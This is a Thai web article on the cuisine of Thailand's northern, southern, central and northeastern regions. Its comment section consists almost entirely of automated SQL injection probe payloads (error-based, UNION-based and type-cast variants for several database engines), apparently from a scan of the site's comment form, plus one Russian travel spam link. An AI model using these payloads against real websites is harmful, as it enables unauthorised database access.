อาหารไทย 4 ภาค

อาหารไทย 4 ภาคพร้อมสูตรและวิธีทำ

อาหารไทย 4 ภาค

อาหารไทยเป็นที่ขึ้นชื่อทั่วโลก ทั่วประเทศ อาหารไทยมีเอกลักษณ์ของตัวเองที่น่าค้นหาและมีความสวยงาม รสชาติที่แตกต่างไปจากอาหารของประเทศอื่นๆ อาหารไทยจะมีรสชาติ หลากหลายประเภท อาหารแต่ละประเภทนั้นสามารถจำแนกได้ตามภูมิภาคของประเทศไทย เมนูอาหารไทยทั้ง4 ภาคนั้นความแตกต่างที่เห็นได้ชัดเจนคือ รูปลักษณ์และรสชาติของเมนูในแต่ละภาคซึ่งปัจจัยหลักของเมนูเหล่านั้นสามารถแจกแจงได้คราวๆ ว่ามาจากสาเหตุหลักอยู่ไม่กี่อย่างคือ ภูมิประเทศ วัฒนธรรม และ สภาพแวดล้อมของสถานที่นั้นๆ

อาหารภาคเหนือ

ด้วยลักษณะภูมิประเทศของภาคเหนือนั้นจะตั้งอยู่ใกล้กับประเทศ พม่า เวียดนาม และยังเคยเป็นอาณาจักรล้านนามาก่อน จึงทำอาหารภาคเหนือนั้นได้รับอิทธิพลมาจากประเทศบ้านใกล้เรือนเคียงมาเป็นอย่างมาก
อาหารทางภาคเหนือจะมีรสชาติอ่อนกว่าอาหารภาคอื่นๆ อาหารภาคเหนือจะมีรสชาติไม่จัดจ้านเหมือนภาคอื่นๆ คนที่อยู่ภาคเหนือจะรับประทานอาหารที่มีรสชาติกลางๆไม่เน้นไปทานใดทางหนึ่งเช่นไม่เปรี้ยว ไม่เค็ม ไม่หวานหรือจืดเกินไป เนื้อสัตว์ที่นิยมนำมาประกอบเมนูอาหารได้แก่เนื้อหมู เนื้อไก่
อาหารขึ้นชื่อทางภาคเหนือที่เรามักจะได้พบเห็นได้แก่ เมนูน้ำพริก เช่น น้ำพริกหนุ่ม น้ำพริกแดง น้ำพริกอ่อง แกงโฮะ แกงฮังเล หรือไส้อั่ว จิ้นปิ้ง แหนม อาหารเหล่าเป็นอาหารที่ขึ้นชื่อของภาคเหนือ ส่วนใหญ่จะนิยมทานกับผักต้มจะเข้ากันได้ดี รวมเมนูอาหารภาคเหนือ

เมนูอาหารใต้

อาหารภาคใต้จะเป็นอาหารที่มีชาติของอาหารจาก มาลายู ภาคกลางและจีน มีรสชาติเผ็ดและเค็ม อาหารภาคใต้ส่วนใหญ่นั้นมักเป็นอาหารที่ประกอบไปด้วยปลา หรือสัตว์ทะเลชนิดอื่นๆ และมีผงขมิ้นในส่วนประกอบเมนูอาหาร เพื่อลดความคาวของสัตว์ทะเลที่นำมาประกอบอาหารนั้นเอง รสชาติของอาหารภาคใต้นั้นจะเผ็ดจัด เค็มเปรี้ยว แต่ไม่นิยมรสหวาน เช่นแกงไตปลา แกงพริก เป็นต้น
อาหารภาคใต้จะมีรสชาติเผ็ดที่สุดในบรรดาภาคอื่นๆเมนูอาหารที่มีชื่อเสียงของภาคใต้ ได้แก่ แกงไตปลา แกงเหลือง จำพวกเมนูเครื่องจิ้มได้แก่ น้ำบูดูที่น้ำมารับประทานกับข้าวยำ และที่พลาดไม่ได้คือ ผัดสะตอ เป็นเมนูที่ขึ้นชื่อของภาคใต้เราเลยทีเดียว รวมเมนูอาหารภาคใต้

เมนูอาหารภาคกลาง

อาหารภาคกลาง รสชาติจะมีทั้งหวาน เปรี้ยว เค็ม และเผ็ด มัน รสชาติจัดจ้านลงตัว กลมกล่อมลงตัวการผสมผสานของรสชาติอาหารภาคกลางนั้นจะใช้ส่วนผสมแตกต่างกันไปตามแต่ละเมนูส่วนใหญ่จะใช้ทั้งเนื้อสัตว์และพืชผักทางการเกษตร สามารถนำมาปรุงได้หลากหลายเมนู อาหารภาคกลางนั้นจะมีความประณีตในการตกแต่งอาหารให้ชวนรับประทาน การนำผัก แตงกวา ผักชี หรือต้นหอมมาตกแต่งหน้าจานอาหารให้ดูน่ารับประทานมายิ่งขึ้นนั้นแสดงให้เห็นถึงรูปลักษณ์ความอุดมสมบูรณ์ภาคกลางที่สามารถจัดหาพืชผักมาจัดวางเพิ่มความสวยงามในเมนูอาหารนั้นๆได้มากขึ้น
เมนูอาหารภาคกลาง โดยทั่วไปจะ มีรสหวานนำเล็กน้อยให้ติดปลายลิ้น การรับประทานอาหารของภาคกลางนั้นส่วนใหญ่จะรับประทานคู่กับข้าวสวยเป็นหลังไม่ว่าจะมีกับข้าวเป็นเมนูใดก็ตาม รวมเมนูอาหารภาคกลาง

เมนูอาหารภาคอีสาน

ภาคอีสานเป็นภาคที่ค่อนข้างแห้งแล้ง วัตถุดิบที่นำมาประกอบอาหารจะเป็นแหล่งอาหารซึ่งหาได้ตามธรรมชาติส่วนใหญ่ ได้แก่ ปลา แมลงบางชนิด พืชผักต่าง ๆ การนำวิธีการถนอมอาหารมาใช้เพื่อรักษาอาหารไว้กินนาน ๆ จึงเป็นส่วนสำคัญในการดำรงชีพของคนอีสาน
อาหารอีสาน ส่วนใหญ่จะมีรสชาติติดเค็มหรือเผ็ด เพราะส่วนหนึ่งได้รับอิทธิพลมาจากอาหารฝั่งประเทศลาว ด้วยสภาพภูมิประเทศที่แห้งแล้งของภาคอีสาน จึงทำให้คนในภูมิภาคอีสานนั้นหาปลาหรือสัตว์ และผักพืชที่หาได้ง่ายๆมาปรุงอาหาร อาหารหลักของภาคอีสานนั้นจะมีข้าวเหนียวเป็นอาหารหลัก รับประทานคู่กับเมนูต่างๆไม่ว่าจะเป็นปิ้ง ย่าง ต้ม หรือเมนูคลุกเคล้า เช่น ปลาย่าง ไก่ย่าง ต้มแซ่บ ลาบ และเมนูอื่นๆอีกมากมาย แต่จะเน้นเอาสัตว์ที่พอหาได้ตามท้องถิ่นนั้นๆ และพลาดไม่อาหารที่ปรุงนั้นต้องมีรสจัด รวมเมนูอาหารภาคอีสาน

อาหารไทย4ภาคทั้งหมดนั้นปัจจุบันเราค่อนข้างหารับประทานได้ง่าย สามารถหารับประทานได้ตามร้านอาหารข้าวแกง ร้านอาหารตามสั่ง ไม่ว่าจะเป็นแกงไตปลา แกงเหลือง หรือ น้ำพริกอ่อง น้ำพริกหนุ่ม อาหารขึ้นชื่อของแต่ละภาคนั้นจะมีเอกลักษณ์ที่ถ่ายทอดจากรุ่นสู่รุ่น รสชาติของความจัดจ้านในแต่ละเมนูก็ยังคงความอร่อย ความประณีตชวนให้รับประทาน

119 Comments on “อาหารไทย 4 ภาค”

 1. yuah’) AND EXTRACTVALUE(9462,CONCAT(0x5c,0x7178787671,(SELECT (ELT(9462=9462,1))),0x7178627a71)) AND (‘ChXB’=’ChXB

 2. yuah AND EXTRACTVALUE(9462,CONCAT(0x5c,0x7178787671,(SELECT (ELT(9462=9462,1))),0x7178627a71))

 3. yuah’) AND 9984=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9984=9984) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND (‘mXoe’=’mXoe

 4. yuah’) AND 1154 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1154=1154) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113))) AND (‘VlNR’=’VlNR

 5. yuah AND 1154 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1154=1154) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)))

 6. yuah’) AND 1700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1700=1700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND (‘HpIh’=’HpIh

 7. yuah AND 1700=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (1700=1700) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)

 8. yuah’ UNION ALL SELECT CONCAT(CONCAT(‘qxxvq’,’SdyIWIctLrkPzVCzJuYXslxmMezkZfdJsvxRNrAM’),’qxbzq’)– DAat

 9. -5687′ UNION ALL SELECT CONCAT(CONCAT(‘qxxvq’,’wxFCNYbrqo’),’qxbzq’)– ivKR

 10. ' AND EXTRACTVALUE(8468,CONCAT(0x5c,0x7178787671,(SELECT (ELT(8468=8468,1))),0x7178627a71)) AND 'uQPm'='uQPm says:

  yuah

 11. ) AND 9930=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND (9488=9488 says:

  yuah

 12. AND 9930=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) says:

  yuah

 13. ') AND 9930=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND ('ufRG'='ufRG says:

  yuah

 14. ' AND 9930=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC) AND 'vhGH'='vhGH says:

  yuah

 15. AND 9930=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (9930=9930) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC)-- oCAE says:

  yuah

 16. ) AND 5975 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5975=5975) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113))) AND (6345=6345 says:

  yuah

 17. AND 5975 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5975=5975) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113))) says:

  yuah

 18. ') AND 5975 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5975=5975) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113))) AND ('tCNx'='tCNx says:

  yuah

 19. ' AND 5975 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5975=5975) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'lFPh'='lFPh says:

  yuah

 20. AND 5975 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5975=5975) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)))-- YIeU says:

  yuah

 21. AND 8827=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) says:

  yuah

 22. AND 8827=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(118)||CHR(113)||(SELECT (CASE WHEN (8827=8827) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(98)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL)-- eGBM says:

  yuah

 23. Путешествуем по Крыму вместе, отдых на море в Крыму. Пляжи, экскурсии, путешествия и оздоровление. Море, солнце и пляж – где отдохнуть, что посмотреть в Крыму? Целебные озера, туристический и пляжный отдых на берегу моря, крымская кухня https://mytravelcrimea.ru/

Leave a Reply

Your email address will not be published.